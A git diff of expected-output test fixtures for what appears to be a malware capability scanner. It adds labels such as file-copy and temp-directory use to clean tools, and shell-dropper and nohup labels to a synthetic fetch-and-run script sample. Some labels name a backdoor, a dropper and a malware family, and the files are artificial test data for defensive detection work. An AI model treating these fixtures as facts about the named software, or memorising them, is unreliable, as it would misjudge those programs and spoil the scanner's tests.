diff --git a/test_data/linux/clean/minio.x86_64.simple b/test_data/linux/clean/minio.x86_64.simple
index 82969fe3c..91573822c 100644
--- a/test_data/linux/clean/minio.x86_64.simple
+++ b/test_data/linux/clean/minio.x86_64.simple
@@ -46,7 +46,9 @@ fs/directory/list
fs/directory/remove
fs/fifo/create
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
+fs/file/delete/forcibly
fs/file/make_executable
fs/file/read
fs/file/times/set
diff --git a/test_data/linux/clean/mongosh.simple b/test_data/linux/clean/mongosh.simple
index ef8c9e1de..e6dfa6c47 100644
--- a/test_data/linux/clean/mongosh.simple
+++ b/test_data/linux/clean/mongosh.simple
@@ -49,6 +49,7 @@ fs/directory/create
fs/directory/list
fs/directory/remove
fs/file/capabilities/set
+fs/file/copy
fs/file/delete
fs/file/delete/forcibly
fs/file/read
diff --git a/test_data/linux/clean/opa.simple b/test_data/linux/clean/opa.simple
index 8be285a32..d8d8b44f9 100644
--- a/test_data/linux/clean/opa.simple
+++ b/test_data/linux/clean/opa.simple
@@ -22,6 +22,7 @@ exec/cmd
exec/program
fs/directory/list
fs/directory/remove
+fs/file/copy
fs/file/delete
fs/file/read
fs/file/stat
diff --git a/test_data/linux/clean/sonarlint-metadata.json.simple b/test_data/linux/clean/sonarlint-metadata.json.simple
index 39ba7c491..81578476a 100644
--- a/test_data/linux/clean/sonarlint-metadata.json.simple
+++ b/test_data/linux/clean/sonarlint-metadata.json.simple
@@ -10,6 +10,8 @@ encoding/json/encode
env/get
fd/read
fd/write
+fs/file/copy
+fs/file/delete/forcibly
fs/file/read
fs/file/write
fs/permission/modify
diff --git a/test_data/linux/synthetic/github-attach-fetch.sh.simple b/test_data/linux/synthetic/github-attach-fetch.sh.simple
index 1f84c282f..ef441705e 100644
--- a/test_data/linux/synthetic/github-attach-fetch.sh.simple
+++ b/test_data/linux/synthetic/github-attach-fetch.sh.simple
@@ -1,8 +1,10 @@
# linux/synthetic/github-attach-fetch.sh
+combo/dropper/shell
fs/permission/modify
net/fetch
-ref/site/github_comment_attachment
+ref/site/github_attachment
ref/site/url
ref/words/backdoor
shell/background_launcher
shell/exec
+shell/nohup
diff --git a/test_data/php/clean/composer-2.7.7.simple b/test_data/php/clean/composer-2.7.7.simple
index 38fa8c0d4..db14c841a 100644
--- a/test_data/php/clean/composer-2.7.7.simple
+++ b/test_data/php/clean/composer-2.7.7.simple
@@ -25,6 +25,7 @@ exec/cmd
exec/shell_command
fs/directory/create
fs/directory/remove
+fs/file/copy
fs/file/delete
fs/file/delete/forcibly
fs/file/times/set
diff --git a/test_data/php/clean/run-tests.php.simple b/test_data/php/clean/run-tests.php.simple
index f853119e3..1aeda091a 100644
--- a/test_data/php/clean/run-tests.php.simple
+++ b/test_data/php/clean/run-tests.php.simple
@@ -10,6 +10,7 @@ fs/directory/create
fs/file/delete
fs/permission/modify
fs/symlink/resolve
+fs/tempdir
kernel/platform
net/http/cookies
net/http/form/upload
diff --git a/test_data/windows/2024.GitHub.Clipper/main.exe.simple b/test_data/windows/2024.GitHub.Clipper/main.exe.simple
index d55d4bae0..e94a3d4a5 100644
--- a/test_data/windows/2024.GitHub.Clipper/main.exe.simple
+++ b/test_data/windows/2024.GitHub.Clipper/main.exe.simple
@@ -36,6 +36,7 @@ fs/file/read
fs/file/write
fs/permission/chown
fs/permission/modify
+fs/tempdir
hash/md5
kernel/cpu/info
malware/family/skuld